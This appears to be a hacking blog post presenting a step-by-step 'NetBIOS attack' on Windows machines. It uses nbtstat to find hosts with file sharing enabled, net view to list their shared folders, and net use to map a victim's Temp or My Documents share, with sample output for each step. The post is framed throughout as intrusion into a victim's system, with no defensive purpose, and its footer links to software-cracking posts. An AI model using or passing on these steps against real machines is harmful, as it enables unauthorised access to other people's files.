SYSTEM INTRUSION IN 15 SECONDS


This is called a Netbios attack.
Nbstat –A
EX: nbstat –A 192.168.1.4
It check connection status of an ip address, scan on a range of IP address for systems with “File and Printer Sharing” turned on.
This will give you a result that looks like this
NetBIOS Remote Machine Name Table
____________________________________
Name Type Status
-------------------------------------------
J-1 <00> UNIQUE Registered
WORK <00> GROUP Registered
J-1 <03> UNIQUE Registered
J-1 <20> UNIQUE Registered
WORK <1E> GROUP Registered
WORK <1D> UNIQUE Registered
A hex code of <20> means you have file and printer sharing turned on.
The next step would be to find out what is being shared.
This is how:
Net view \\
EX:net view \\192.168.1.4

We get a response that looks something like this.

Shared resources at \\192.168.1.4
Sharename              Type Comment
MY DOCUMENTS          Disk
TEMP                         Disk
The command was completed successfully.

This shows the hacker that his potential victim has their My Documents Folder shared and their Temp directory shared. For the hacker to then get access to those folders his next command will be.
Net use x: \\\temp
Ex:net use x:\\192.168.1.4\temp

If all goes well for the hacker, he/she will then get a response of
(The command was completed successfully.)

Comments

Popular posts from this blog

HOW TO CRACK WINRAR USING OLLYDBG

Hacking Attacks

Bluetooth Bluejack